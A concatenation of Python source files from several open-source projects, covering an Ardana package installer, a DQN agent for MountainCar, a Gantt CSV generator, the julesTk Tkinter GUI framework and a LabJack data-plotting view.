changed = changed or changed_ret
except InstallerError as e:
module.fail_json(msg="Installation failed",
name=name,
service=service_name,
version=str(spec.version),
exception=str(e))
return
if clean:
# TODO(jang)
pass
# activate defaults to act_on but if we are removing package then
# we can't activate it
if state != 'absent' and activate == "act_on" \
and name is not None and service_name is not None:
try:
(changed_ret, version) = activate_install(spec, conf)
except InstallerError as e:
module.fail_json(msg="Activation failed",
name=name,
service=service_name,
version=str(spec.version),
exception=str(e))
return
version = _report_version(spec.version)
try:
suffix = spec.suffix
except AttributeError:
suffix = None
_version = {'version': version,
'suffix': spec.suffix if hasattr(spec, 'suffix') else suffix,
'v': 1,
}
module.exit_json(state=state, name=name, group=group_name,
extra_mode_bits=extra_mode_bits, service=service_name,
package_version=str(spec.version), suffix=suffix,
# version should be deprecated - replace
# with package_version or suffix
version=_version,
cache=cache_op, clean=clean,
changed=changed)
def _report_version(version):
if version is cache.VERSION_LATEST:
return None
return str(version)
def install(spec, conf):
(changed, spec) = expand.explode(conf, spec)
changed = service.refer(conf, spec) or changed
current_version = activate.active_version(conf.SERVICE_LOCATION, spec)
changed = service.refer(conf, spec) or changed
if current_version == spec.version:
changed = False
return (changed, spec)
def uninstall(spec, conf):
changed = False
current_version = activate.active_version(conf.SERVICE_LOCATION, spec)
if current_version is not None and (spec.version is config.VERSION_LATEST
or current_version == spec.version):
spec.version = current_version
activate.deactivate(conf.SERVICE_LOCATION, spec)
changed = True
changed = service.remove(conf, spec) or changed
if not service.count_refs(conf, spec):
changed = expand.remove(conf, spec) or changed
return (changed, spec)
def activate_install(spec, conf):
current_version = activate.active_version(conf.SERVICE_LOCATION, spec)
if current_version == spec.version:
return (False, spec)
if current_version is not None:
activate.deactivate(conf.SERVICE_LOCATION,
Spec(package=spec.package, service=spec.service,
version=current_version))
# Leaving removal of service venv until separate cleanup phase
# service.remove(conf, spec, current_version)
activate.activate(conf.SERVICE_LOCATION, spec)
# TODO(howleyt): should we differentiate between new vs. old version?
return (True, spec)
```
#### File: packager/ardana_packager/expand.py
```python
import grp
import os
import os.path
import shutil
import tarfile
from ardana_packager.activate import active_version
import ardana_packager.cache as cache
from ardana_packager.error import InstallerError
def package_dir(config, spec):
return os.path.join(config.VENV_LOCATION, spec.package + "-" + spec.suffix)
def explode(config, spec):
"""Take the package installed in cache_dir and expand it.
This will be a no-op if there's already something
at the target.
We require the source package to be present in
the cache_dir, with the name
$(basename $location)-suffix.tgz
Returns (True, spec) if it modified the filesystem.
"""
spec = cache.assert_package_present(config, spec)
cache_file = cache.cache_file(config, spec)
target_dir = package_dir(config, spec)
if not os.path.isfile(cache_file):
raise InstallerError(
"{cache_file} not found"
.format(cache_file=cache_file))
if not tarfile.is_tarfile(cache_file):
raise InstallerError(
"{cache_file} is not in the correct format"
.format(cache_file=cache_file))
if os.path.isdir(target_dir):
# We assume there's nothing to do
return (False, spec)
if os.path.exists(target_dir):
raise InstallerError(
"{target_dir} already exists"
.format(target_dir=target_dir))
try:
os.mkdir(target_dir, 0o755)
gname = config['group_name']
group = grp.getgrnam(gname)
gid = group.gr_gid
with tarfile.open(cache_file) as tar:
members = tar.getmembers()
for m in members:
m.uid = 0
m.gid = gid
m.uname = 'root'
m.gname = gname
m.mode |= config['extra_mode_bits']
tar.extractall(path=target_dir, members=members)
except Exception as e:
raise InstallerError(
"{cache_file} could not be exploded to {target_dir}"
.format(cache_file=cache_file, target_dir=target_dir), e)
return (True, spec)
def remove(config, spec):
"""Remove an exploded version
This is an error if the version's currently activated.
There's no error if the version is already not there.
Returns True if it modified the filesystem
"""
location = os.path.join(config.VENV_LOCATION, spec.package)
current_version = active_version(config.VENV_LOCATION, spec)
if current_version == spec.version:
raise InstallerError(
"Cannot remove {version} for {location} since it is current active"
.format(location=location, version=spec.version))
target = location + "-" + spec.suffix
if not os.path.exists(target):
return False
if not os.path.isdir(target):
msg = ("Cannot remove {version} for {location} since it is not"
" a directory".format(location=location, version=spec.version))
raise InstallerError(msg)
try:
# Delete recursively
shutil.rmtree(target)
except Exception as e:
raise InstallerError(
"Could not delete {target}"
.format(target=target), e)
return True
```
#### File: packager/ardana_packager/version.py
```python
import os.path
import tarfile
import yaml
from ardana_packager.config import DIR_FORMAT, TAR_FORMAT, VERSION_LATEST # noqa
from ardana_packager.error import InstallerError
class Version(object):
def __init__(self, parts=None):
if parts is None:
parts = [[0]]
self._parts = parts
def __eq__(self, other):
return other is not None and self._parts == other._parts
def __ne__(self, other):
return other is None or self._parts != other._parts
def __le__(self, other):
return self._parts <= other._parts
def __lt__(self, other):
return self._parts < other._parts
def __ge__(self, other):
return self._parts >= other._parts
def __gt__(self, other):
return self._parts > other._parts
def __str__(self):
return ':'.join('.'.join(str(n) for n in p) for p in self._parts)
def from_str(s):
"""Given a plain string version, return the Version object"""
return Version(
[[int(n) if n.isdigit() else n for n in p.split('.')]
for p in s.split(':')])
with open(os.path.join(os.path.dirname(__file__), 'versions.yml')) as f:
_BEST_GUESS = yaml.safe_load(f)
def best_guess(s):
try:
return _BEST_GUESS[s]
except KeyError:
if ":" in s:
return s
else:
return "2.0.0:" + s
def from_tarball(fn):
"""Given a tarball path, extract Version from META-INF/version.yml.
If that file does not exist, use your best guess from the
suffix (which *must* work).
"""
with tarfile.open(fn) as tf:
version_file = os.path.join('.',
'META-INF',
'version.yml')
try:
f = tf.extractfile(version_file)
if f is not None:
version_metadata = yaml.safe_load(f)
version_string = (str(version_metadata['version']) + ":" +
str(version_metadata['timestamp']))
if 'patch' in version_metadata:
version_string += ":" + str(version_metadata['patch'])
return from_str(version_string)
except KeyError:
pass
# Guess from the suffix
return guess_from_suffix(fn, TAR_FORMAT)
def guess_from_suffix(file_name, format, group=2):
"""Return a best guess, given a directory or tarball name"""
file = os.path.basename(file_name)
match = format.match(file)
if not match:
raise InstallerError(
"{} doesn't have a viable suffix".format(file_name))
version = match.group(group)
# The suffix is from an older ISO image
guess = best_guess(version)
if guess == version:
raise InstallerError("{} has an unknown suffix".format(file_name))
return from_str(guess)
def from_dir(dir):
"""Given a directory, look in dir/META-INF/version.yml.
If that's not there, guess from the suffix.
"""
version_file = os.path.join(dir, 'META-INF', 'version.yml')
if os.path.exists(version_file):
with open(version_file) as f:
version_metadata = yaml.safe_load(f)
version_string = (str(version_metadata['version']) + ":" +
str(version_metadata['timestamp']))
if 'patch' in version_metadata:
version_string += ":" + str(version_metadata['patch'])
return from_str(version_string)
# Guess from the suffix
return guess_from_suffix(dir, DIR_FORMAT)
def from_service_dir(dir):
"""Given a directory, look in dir/venv/META-INF/version.yml.
Otherwise, guess from the suffix.
"""
version_file = os.path.join(dir, 'venv', 'META-INF', 'version.yml')
if os.path.exists(version_file):
with open(version_file) as f:
version_metadata = yaml.safe_load(f)
version_string = (str(version_metadata['version']) + ":" +
str(version_metadata['timestamp']))
if 'patch' in version_metadata:
version_string += ":" + str(version_metadata['patch'])
return from_str(version_string)
# Guess from the suffix
return guess_from_suffix(dir, DIR_FORMAT)
class Spec(object):
"""Package and Service version specifier.
A specifier: this is a potential four-tuple,
with a package name (eg, "nova"), a directory
suffix (eg, "20160101T120000Z"), a Version object
(which may be specified as a string on creation),
a cache filename (sans cache directory),
and a service name (eg, "nova-api").
"""
def __init__(self, package=None, service=None,
suffix=None, version=None, tarball=None):
# Only initialise attributes if they're given;
# we catch missing ones this way.
if package is not None:
self.package = package
if service is not None:
self.service = service
if suffix is not None:
self.suffix = suffix
if isinstance(version, Version):
self.version = version
elif version is VERSION_LATEST:
self.version = version
elif version is not None:
self.version = from_str(version)
if tarball is not None:
self.tarball = tarball
def test():
v1 = Version([[3, 0, 0], ['20160501T120000Z']])
assert str(v1) == '3.0.0:20160501T120000Z'
v2 = from_str('3.0.0:20160501T120000Z')
assert v1 == v2
if __name__ == '__main__':
test()
```
#### File: ardana-dev-tools/tests/test_filter_collections_plugin.py
```python
from oslotest import base
import tests.filters_base # noqa
from collection_filters import do_collect
from collection_filters import do_flatten
from collection_filters import do_reduce
class FlattenTests(base.BaseTestCase):
def test_simple(self):
list1 = [{'ab': {'ac': 1}},
{'bb': {'bc': 2}}]
list2 = [{'cb': {'cc': 3}}]
flatlist = [
{'ab': {'ac': 1}},
{'bb': {'bc': 2}},
{'cb': {'cc': 3}}
]
self.assertEqual(list(do_flatten([list1, list2])), flatlist)
class ReduceTests(base.BaseTestCase):
def test_simple(self):
collection = [
{'a': {'b': 1}},
{'a': {'b': 2}},
{'a': {'b': 3}}
]
self.assertEqual(list(do_reduce(collection, 'a', 'b')), [1, 2, 3])
self.assertEqual(list(do_reduce(collection, 'a', 'd')), [])
def test_defaults(self):
collection = [
{'a': {'b': 1}},
{'a': {'b': 2}},
{'a': {'c': 3}}
]
self.assertEqual(list(do_reduce(collection, 'a', 'b', default=99)),
[1, 2, 99])
self.assertEqual(list(do_reduce(collection, 'a', 'd', default=99)),
[99, 99, 99])
class CollectTests(base.BaseTestCase):
def test_simple(self):
collection = {
'a': {'ab': {'ac': 1}},
'b': {'bb': {'bc': 2}},
'c': {'cb': {'cc': 3}}
}
self.assertItemsEqual(
list(do_collect(collection, ['a', 'c'])),
[v for k, v in collection.items() if k != 'b'])
self.assertItemsEqual(
list(do_collect(collection, ['a', 'b', 'c'])),
collection.values())
self.assertItemsEqual(
list(do_collect(collection, ['a', 'b', 'c', 'd'])),
collection.values())
``` |
{
"source": "JJonahJson/MountainCar-v313",
"score": 2
} |
#### File: MountainCar-v313/code/dqn_agent.py
```python
import numpy as np
import tensorflow as tf
from net_model import NetModel
from training_mode import TrainingMode
class DQNAgent:
def __init__(self, num_states, num_actions, hidden_units, gamma, max_experiences, min_experiences, batch_size, lr):
self.gamma = gamma
self.batch_size = batch_size
self.num_actions = num_actions
self.min_experiences = min_experiences
self.max_experiences = max_experiences
self.optimizer = tf.optimizers.Adam(lr)
self.model = NetModel(num_states, hidden_units, num_actions)
self.experience = {'s': [], 'a': [], 'r': [], 's2': [], 'done': []}
def predict(self, inputs):
return self.model(np.atleast_2d(inputs.astype('float32')))
def train(self, target_net, chosen_training):
if len(self.experience['s']) < self.min_experiences:
return 0
ids = np.random.randint(low=0, high=len(self.experience['s']), size=self.batch_size)
states = np.asarray([self.experience['s'][i] for i in ids])
actions = np.asarray([self.experience['a'][i] for i in ids])
rewards = np.asarray([self.experience['r'][i] for i in ids])
states_next = np.asarray([self.experience['s2'][i] for i in ids])
dones = np.asarray([self.experience['done'][i] for i in ids])
if chosen_training is TrainingMode.DoubleDQN:
values = np.array(target_net.predict(states_next))[range(self.batch_size), np.argmax(self.predict(states_next), axis=1)]
actual_values = np.where(dones, rewards, rewards + self.gamma * values)
else:
value_next = np.max(target_net.predict(states_next), axis=1)
actual_values = np.where(dones, rewards, rewards+self.gamma*value_next)
with tf.GradientTape() as tape:
selected_action_values = tf.math.reduce_sum(self.predict(states) * tf.one_hot(actions, self.num_actions), axis=1)
loss = tf.math.reduce_mean(tf.square(actual_values - selected_action_values))
variables = self.model.trainable_variables
gradients = tape.gradient(loss, variables)
self.optimizer.apply_gradients(zip(gradients, variables))
return loss
def get_action_epsilon_greedy(self, states, epsilon):
if np.random.random() < epsilon:
return np.random.choice(self.num_actions)
else:
return np.argmax(self.predict(np.atleast_2d(states))[0])
def add_experience(self, exp):
if len(self.experience['s']) >= self.max_experiences:
for key in self.experience.keys():
self.experience[key].pop(0)
for key, value in exp.items():
self.experience[key].append(value)
def copy_weights(self, train_net):
variables1 = self.model.trainable_variables
variables2 = train_net.model.trainable_variables
for v1, v2 in zip(variables1, variables2):
v1.assign(v2.numpy())
def soft_update_weights(self, train_net):
tau = 0.1
q_network_theta = train_net.model.get_weights()
target_network_theta = self.model.get_weights()
counter = 0
for q_weight, target_weight in zip(q_network_theta, target_network_theta):
target_weight = target_weight * (1 - tau) + q_weight * tau
target_network_theta[counter] = target_weight
counter += 1
self.model.set_weights(target_network_theta)
``` |
{
"source": "JJones4452/gantt-creator",
"score": 3
} |
#### File: JJones4452/gantt-creator/CreateGanttCsv.py
```python
import pandas as pd
import numpy as np
import re, sys, os
import locations as loc
sys.path.append(loc.utility_path)
import Utility
class CreateGanttCsv:
def __init__(self, directory: str) -> None:
self.directory: str = directory
pass
def create_csv(self, filename: str, overwrite: bool):
if(not re.search("(\.\w+)", filename)):
filename += ".csv"
if(Utility.find(filename, self.directory) and not overwrite):
return 0
df_template: dict[str, list[str or np.datetime64]] = \
{
"Task" : [],
"Task Type" : [],
"Start Date" : [],
"End Date" : [],
"Completion Time" : []
}
my_frame = pd.DataFrame(df_template)
my_frame.to_csv(os.path.join(self.directory, filename), index=False)
# myobj = CreateGanttCsv(loc.gantt_directory)
# myobj.create_csv("Gantt_Start.csv", True)
``` |
{
"source": "jjongbloets/jules_tk",
"score": 2
} |
#### File: examples/console/console.py
```python
from julesTk import app, controller, view
from julesTk.utils.console import LogView
from julesTk.controller import poller
import logging
__author__ = "<NAME> <<EMAIL>>"
class LogApp(app.Application):
def __init__(self):
super(LogApp, self).__init__()
def _prepare(self):
self.root.title('Console')
self.root.geometry('500x500+200+200')
self.root.minsize(300, 300)
self.add_controller("main", MainController(self))
@property
def main(self):
return self.get_controller("main")
def _start(self):
self.main.start()
class MainView(view.View):
def _prepare(self):
self.pack(fill=view.tk.BOTH, expand=1)
self.grid_rowconfigure(0, weight=1)
self.grid_columnconfigure(0, weight=1)
frmb = view.ttk.Frame(self, relief=view.tk.RAISED, borderwidth=1)
frmb.grid(row=0, column=0, sticky="nsew")
self._prepare_body(frmb)
frmt = view.ttk.Frame(self, relief=view.tk.RAISED, borderwidth=1)
frmt.grid(row=1, column=0, sticky="ew")
self._prepare_tools(frmt)
def _prepare_body(self, parent=None):
if parent is None:
parent = self
log = LogView(parent)
self.add_widget("log", log)
log.pack(fill=view.tk.BOTH, expand=1)
def _prepare_tools(self, parent=None):
if parent is None:
parent = self
log = self.get_widget("log")
btn = view.ttk.Button(parent, text="Close", command=self.exit)
btn.pack(side=view.tk.RIGHT)
btc = view.ttk.Button(parent, text="Clear", command=log.clear)
btc.pack(side=view.tk.RIGHT)
def exit(self):
self.application.stop()
class MainController(poller.Poller, controller.ViewController):
VIEW_CLASS = MainView
def __init__(self, parent):
super(MainController, self).__init__(parent=parent)
self._log = logging.getLogger()
self._log.setLevel(20)
self._count = 0
def _prepare(self):
return controller.ViewController._prepare(self)
def _start(self):
controller.ViewController._start(self)
handler = logging.StreamHandler(self.view.get_widget("log"))
handler.level = 20
self._log.addHandler(handler)
self.run()
def execute(self):
self._log.info("Cycle {}".format(self._count))
self._count += 1
if __name__ == "__main__":
app = LogApp()
app.run()
```
#### File: examples/progress/progress.py
```python
from julesTk import app, controller, view
from julesTk.controller import poller
from julesTk.utils import progress
class ProgressApp(app.Application):
def __init__(self):
super(ProgressApp, self).__init__()
def _prepare(self):
self.add_controller("main", MainController(self))
@property
def main(self):
return self.get_controller("main")
def _start(self):
self.main.start()
class MainView(view.View):
def _prepare(self):
self.root.resizable(False, False)
self.configure_grid(self)
btn = view.ttk.Button(self, text="Determinate", command=self.controller.progress_det)
self.add_widget("button1", btn)
self.configure_grid(btn, row=0, column=0)
btn = view.ttk.Button(self, text="Indeterminate", command=self.controller.progress_indet)
self.add_widget("button2", btn)
self.configure_grid(btn, row=0, column=1)
class MainController(controller.ViewController):
VIEW_CLASS = MainView
def __init__(self, parent, view=None):
super(MainController, self).__init__(parent=parent, view=view)
self._pb = None
def _prepare(self):
return controller.ViewController._prepare(self)
def _start(self):
controller.ViewController._start(self)
def progress_det(self):
self._pb = progress.ProgressBar(self.view, mode="determinate")
self._pb.view.title("Loading..")
self._pb.view.message = "Please wait.."
self._pb.view.geometry('300x100+200+200')
self._pb.start(self.long_process, block=True, auto_close=True)
def long_process(self):
import time
i = 0
while i < 100:
i += 5
self._pb.increase(5)
time.sleep(0.1)
return True
def progress_indet(self):
self._pb = progress.ProgressBar(self.view, mode="indeterminate", auto_close=False)
self._pb.view.message = "Please wait..."
self._pb.view.title("Operation in progress..")
self._pb.view.geometry('300x100+200+200')
self._pb.start(self.long_process)
if __name__ == "__main__":
app = ProgressApp()
app.run()
```
#### File: examples/question/question.py
```python
from julesTk import app, controller, view
from julesTk.utils.modals import QuestionBox
class QuestionApp(app.Application):
def __init__(self):
super(QuestionApp, self).__init__()
def _prepare(self):
self.add_controller("main", MainController(self))
@property
def main(self):
return self.get_controller("main")
def start(self):
self.main.start()
class MainView(view.View):
def _prepare(self):
# prevent resize
self.root.resizable(False, False)
# layout this frame
self.configure_grid(self)
btn = view.ttk.Button(self, text="Ask!", command=self.ask_question)
self.add_widget("button", btn)
self.configure_grid(btn, row=0, column=0, columnspan=2)
lbd = view.ttk.Label(self, text="Your said:")
self.add_widget("description", lbd)
self.configure_grid(lbd, row=1, column=0)
response = view.tk.StringVar(self)
self.add_variable("response", response)
lbr = view.ttk.Label(self, textvariable=response)
self.add_widget("response", lbr)
self.configure_grid(lbr, row=1, column=1)
def ask_question(self):
self.controller.ask_question()
@property
def response(self):
return self.get_variable("response").get()
@response.setter
def response(self, value):
self.get_variable("response").set(value)
class MainController(controller.ViewController):
VIEW_CLASS = MainView
def ask_question(self):
self.view.response = QuestionBox.ask(
self.view, "What is your name?"
)
if __name__ == "__main__":
app = QuestionApp()
app.run()
```
#### File: julesTk/model/__init__.py
```python
from julesTk import ThreadSafeObject
from julesTk.utils.observe import Observable
__author__ = "<NAME> <<EMAIL>>"
class Model(Observable, ThreadSafeObject):
def __init__(self):
super(Model, self).__init__()
self._data = None
@property
def data(self):
"""RAW Representation of the data contained in the model"""
with self.lock:
result = self._data
return result
def update(self):
"""Request the model to update it self"""
raise NotImplementedError
```
#### File: julesTk/utils/modals.py
```python
from julesTk import view, controller
from julesTk.view.window import Window
__author__ = "<NAME> <<EMAIL>>"
class ModalWindow(Window):
"""A window taking all focus and blocking interaction with other windows"""
STATE_BLOCKED = 4
def __init__(self, parent, ctrl):
super(ModalWindow, self).__init__(parent, ctrl)
self.application.register_hook("APP_CLOSE", self.hide)
def _prepare(self):
raise NotImplementedError
def _show(self):
super(ModalWindow, self)._show()
self.transient(self.parent)
self.grab_set()
self._block()
def block(self):
self._view_state = self.STATE_BLOCKED
return self._block()
def _block(self):
self.update()
self.root.wait_window(self)
def _hide(self):
return False
def _close(self):
self.application.remove_hook("APP_CLOSE", self.hide)
super(ModalWindow, self)._close()
def is_blocked(self):
return self._view_state == self.STATE_BLOCKED
class Dialog(ModalWindow):
"""Basic Dialog Window"""
def __init__(self, parent, ctrl):
super(Dialog, self).__init__(parent, ctrl)
self._response = None
# self._prepare()
@property
def response(self):
"""Returns the input of the user given in the ModalWindow
Developers can use this communicate the input of the window to the controller
"""
return self._response
def _prepare(self):
self.grid()
self.configure_column(self, 0)
self.configure_row(self, [0, 1, 2])
# header
fmh = self.add_widget(
"header", view.ttk.Frame(self)
)
self.header(fmh)
self.configure_grid(fmh, row=0, column=0)
# body
fmb = self.add_widget(
"body", view.ttk.Frame(self)
)
self.body(fmb)
self.configure_grid(fmb, row=1, column=0)
# footer
fmf = self.add_widget(
"footer", view.ttk.Frame(self)
)
self.footer(fmf)
self.configure_grid(fmf, row=2, column=0)
def header(self, parent):
"""Header of the dialog"""
return True # override
def body(self, parent):
"""Build the body of the dialog, parent refers to parent frame"""
return True # override
def footer(self, parent):
"""Build the buttons of the dialog, parent refers to parent frame"""
return True # override
def validate(self):
return True # override
def start(self):
return self.show()
def stop(self):
return self.close()
class SimpleDialog(Dialog):
def __init__(self, parent, ctrl, buttons=None):
super(SimpleDialog, self).__init__(parent, ctrl)
self._message = view.tk.StringVar("")
if buttons is None:
buttons = []
if len(buttons) == 0:
buttons = [{"id": "ok", "caption": "Ok", "value": True}]
self._buttons = buttons
@property
def message(self):
return self._message.get()
@message.setter
def message(self, v):
self._message.set(v)
def body(self, parent):
lbm = view.ttk.Label(parent, textvariable=self._message)
lbm.pack(side=view.tk.TOP, fill=view.tk.BOTH, expand=1)
def footer(self, parent):
idx = 0
for button in self._buttons:
# get button id
name = button.get("id", None)
if name is None:
name = idx
idx += 1
# get caption
caption = button.get("caption", name)
# get return value
value = button.get("value", name)
# check if set to default
is_default = button.get("default", False)
if is_default:
self._response = value
# add button
btn = self.make_button(parent, name, caption, value, is_default)
btn.pack(side=view.tk.LEFT, padx=5)
def make_button(self, parent, name, caption, value, is_default=False):
"""Creates a button"""
default = view.tk.ACTIVE if is_default else view.tk.NORMAL
btn = view.ttk.Button(
parent, text=caption, default=default,
command=lambda i=value: self.process_click(i)
)
# register button in registry
self.add_widget(name, btn)
return btn
def process_click(self, value):
pass # overload
class MessageBox(SimpleDialog):
def __init__(self, parent, ctrl, buttons=None):
""" Initialize a MessageBox
:param parent: Reference to parent view
:type parent: julesTk.view.BaseView
:param ctrl: Reference to controller class
:type ctrl: julesTk.controller.BaseController
:param buttons: List of button definitions.
A button definition is dictionary with the keys: id, caption, value
:type buttons: list[dict[str, str | int | float]]
"""
super(MessageBox, self).__init__(parent, ctrl, buttons=buttons)
@classmethod
def alert(cls, parent, title, message, buttons=None):
"""Show an alert"""
if not isinstance(parent, (view.tk.Tk, view.tk.Frame, view.BaseView)):
raise ValueError("Expected a controller not a {}".format(type(parent)))
mb = cls(parent, None, buttons=buttons)
mb.title = title
mb.message = message
mb.show()
return mb.response
def process_click(self, value):
self._response = value
self.close()
class QuestionBox(Dialog):
def __init__(self, parent, ctrl):
super(QuestionBox, self).__init__(parent, ctrl)
self._question = view.tk.StringVar(self)
self._answer = view.tk.StringVar(self)
self._error = view.tk.StringVar(self)
@classmethod
def ask(cls, parent, question, default=None):
if not isinstance(parent, (view.tk.Tk, view.tk.Frame, view.BaseView)):
raise ValueError("Expected a view not a {}".format(type(parent)))
qb = cls(parent, None)
qb.question = question
qb._response = default
qb.answer = default
qb.show()
return qb.response
@property
def question(self):
return self._question.get()
@question.setter
def question(self, value):
self._question.set(value)
@property
def answer(self):
return self._answer.get()
@answer.setter
def answer(self, value):
value = "" if value is None else value
self._answer.set(value)
@property
def error(self):
return self._error
@error.setter
def error(self, text):
self._error.set(text)
def show_validation_msg(self):
lbv = self.get_widget("validate")
lbv.grid()
def hide_validation_msg(self):
lbv = self.get_widget("validate")
lbv.grid_remove()
def header(self, parent):
# add question
lbq = view.ttk.Label(parent, textvariable=self._question)
self.configure_grid(
lbq, padx=10, pady=5
)
def body(self, parent):
# add answer
ena = view.ttk.Entry(
parent, textvariable=self._answer
)
self.configure_grid(
ena, padx=15, pady=5
)
# add validation
view.ttk.Style().configure(
"Error.TLabel", foreground="red"
)
lbv = view.ttk.Label(
parent, textvariable=self._error, style="Error.TLabel"
)
self.add_widget("validate", lbv)
self.configure_grid(
lbv, row=1, padx=20
)
self.hide_validation_msg()
def footer(self, parent):
self.configure_column(parent, [0, 1])
# add cancel
view.ttk.Button(
parent, text="Cancel", command=self.cancel
).pack(side=view.tk.LEFT)
self.bind("<Escape>", lambda x: self.cancel())
# add ok
view.ttk.Button(
parent, text="Ok", command=self.ok
).pack(side=view.tk.LEFT)
self.bind("<Return>", lambda x: self.ok())
def validate(self):
response = self._answer.get()
result = response not in (None, "")
if not result:
self.error = "Please provide an answer"
self.show_validation_msg()
return result
def cancel(self):
self.close()
def ok(self):
if self.validate():
self._response = self._answer.get()
self.close()
```
#### File: julesTk/view/plot.py
```python
from julesTk.view import *
import matplotlib
matplotlib.use("TkAgg")
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg
from matplotlib.figure import Figure
class PlotFrame(Frame, object):
def __init__(self, parent):
super(PlotFrame, self).__init__(parent)
self._figure = None
self._canvas = None
self._toolbar = None
self._legend = None
self._axes = None
def _setup_figure(self, size, dpi=100):
if not isinstance(size, tuple) and not len(size) == 2:
raise ValueError("Invalid value for size (need tuple of length 2)")
f = Figure(figsize=size, dpi=dpi)
self._figure = f
def _setup_canvas(self):
if not isinstance(self.figure, Figure):
raise ValueError("Invalid figure object")
self._canvas = FigureCanvasTkAgg(self.figure, self)
self._setup_toolbar()
self.canvas.show()
self._canvas.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
def _setup_toolbar(self):
self._toolbar = NavigationToolbar2TkAgg(self.canvas, self)
self.toolbar.update()
self.canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
def _setup_subplot(self):
self._axes = self.figure.add_subplot(111)
@property
def figure(self):
"""Returns the current add_plot figure of this Frame
:rtype: matplotlib.figure.Figure
"""
return self._figure
@property
def canvas(self):
"""Returns the current canvas of this frame
:rtype: matplotlib.backends.backend_tkagg.FigureCanvasTkAgg
"""
return self._canvas
@property
def axes(self):
"""Returns the current subplot in the figure
:rtype: matplotlib.axes.Axes
"""
return self._axes
@property
def legend(self):
return self._legend
@property
def toolbar(self):
return self._toolbar
def setup(self, size=None, dpi=100):
if size is None:
size = (5, 5)
self._setup_figure(size, dpi)
self._setup_canvas()
self._setup_subplot()
def add_legend(self):
if self.axes is not None:
self._legend = self.axes.legend(loc='best')
def draw(self):
self.canvas.draw()
def clear(self):
self.figure.clear()
self._setup_subplot()
self.canvas.draw()
class PlotView(View):
""" A view with a plot embedded.
"""
def __init__(self, parent, controller):
super(PlotView, self).__init__(parent, controller)
self._plot = None
@property
def plot(self):
""" Returns the plot frame embedded in this frame
:rtype: julesTk.view.plot.PlotFrame
"""
return self._plot
def body(self):
self.configure_grid(self)
self.setup_plot()
def setup_plot(self):
self._plot = PlotFrame(self)
self.plot.setup()
```
#### File: julesTk/view/window.py
```python
from julesTk.view import tk, BaseView
from julesTk.view.viewset import BaseViewSet
__author__ = "<NAME> <<EMAIL>>"
class Window(tk.Toplevel, BaseView):
def __init__(self, parent, controller):
tk.Toplevel.__init__(self, parent)
BaseView.__init__(self, parent, controller)
self.protocol("WM_DELETE_WINDOW", self.exit)
@property
def root(self):
"""Return the root view
:rtype: Tkinter.Tk or tkinter.Tk
"""
result = self.parent
if self.controller is not None:
result = self.controller.root
elif isinstance(result, BaseView):
result = self.parent.root
return result
@property
def application(self):
result = self.parent
if self.controller is not None:
result = self.controller.application
elif isinstance(result, BaseView):
result = self.parent.application
return result
def _prepare(self):
raise NotImplementedError
def _show(self):
self.deiconify()
def _hide(self):
self.withdraw()
return True
def _close(self):
if self.controller is not None and not self.controller.is_stopped():
self.controller.stop()
self.destroy()
return True
def exit(self):
self.close()
class WindowViewSet(Window, BaseViewSet):
"""A window that can contain multiple views"""
def _prepare(self):
raise NotImplementedError
def _close(self):
BaseViewSet.close_views(self)
return super(WindowViewSet, self)._close()
``` |
{
"source": "jjongbloets/pyLabJackView",
"score": 2
} |
#### File: pyLabJackView/view/labjack.py
```python
from julesTk.view import *
from julesTk.view.plot import PlotFrame
import numpy as np
from datetime import datetime as dt
__author__ = "<NAME> <<EMAIL>>"
class LabJackPlotFrame(PlotFrame):
"""Frame capable of plotting labjack data"""
def __init__(self, parent):
super(LabJackPlotFrame, self).__init__(parent)
self._t_zero = None
self._lines = {}
@property
def t_zero(self):
""" Returns the time zero of the plot
:rtype: datetime.datetime
"""
if self._t_zero is None:
self._t_zero = dt.now()
return self._t_zero
def t_since(self, t_point=None):
t_zero = self.t_zero
if t_point is None:
t_point = dt.now()
return (t_point - t_zero).total_seconds()
def clear(self):
self._lines = {}
super(LabJackPlotFrame, self).clear()
self._t_zero = None
def update_line(self, ain, x, y):
if not isinstance(x, (tuple, list)):
x = x,
if not isinstance(y, (tuple, list)):
y = y,
x_new = []
for v in x:
if isinstance(v, dt):
x_new.append(self.t_since(v))
x = x_new
del x_new
if ain in self._lines.keys():
line = self._lines[ain]
xlim, ylim = self.add_line_point(line, x, y)
else:
xlim, ylim = self.add_line(ain, x, y)
return xlim, ylim
def add_line(self, ain, x, y):
"""Adds a new line to the plot"""
l = self.axes.plot(x, y, label="AIN {}".format(ain))[0]
self._lines[ain] = l
return self.axes.get_xlim(), self.axes.get_ylim()
def add_line_point(self, line, x, y):
"""Adds a new point to an existing line"""
xdata = np.append(line.get_xdata(), x)
line.set_xdata(xdata)
ydata = np.append(line.get_ydata(), y)
line.set_ydata(ydata)
return (xdata.min(), xdata.max()), (ydata.min(), ydata.max())
class LabJackView(View):
GAIN_INDEXES = {
"x1": 0,
"x10": 1,
"x100": 2,
"x1000": 3,
"auto": 15,
}
REFRESH_RATES = {
# "50 msec": 0.05,
# "100 msec": 0.1,
# "200 msec": 0.2,
"500 msec": 0.5,
"1 sec": 1,
"2 sec": 2,
"5 sec": 5,
"10 sec": 10,
"15 sec": 15,
"30 sec": 30,
"1 min": 60,
# "5 min": 300,
# "10 min": 600,
# "30 min": 1800,
# "1 hour": 3600,
} # in seconds per update
def __init__(self, parent, controller):
super(LabJackView, self).__init__(parent, controller)
@property
def controller(self):
""" Returns the
:return:
:rtype: pyLabJackView.controller.labjack.LabJackController
"""
return self._controller
@property
def plot(self):
"""Returns the add_plot object loaded in this view
:rtype: pyLabJackView.view.labjack.LabJackPlotFrame
"""
return self.get_widget("add_plot")
@property
def refresh_rate(self):
v = self.variables["refresh_rate"].get()
return self.REFRESH_RATES.get(v, 1)
@property
def resolution(self):
v = self.variables["resolution"].get()
return int(v)
@property
def gain(self):
v = self.variables["gain"].get()
return self.GAIN_INDEXES.get(v, 1)
def set_status_text(self, str):
self.variables["status"].set(str)
def _prepare(self):
self.configure_grid(self)
# add widgets
lbj_ports_frame = ttk.Frame(self)
self.configure_grid(lbj_ports_frame, row=0, column=0)
self.setup_labjack_ports(parent=lbj_ports_frame)
lbj_msr_frame = ttk.Frame(self)
self.configure_grid(lbj_msr_frame, row=1, column=0)
self.setup_labjack_settings(parent=lbj_msr_frame)
ctrl_frame = ttk.Frame(self)
self.configure_grid(ctrl_frame, row=2, column=0)
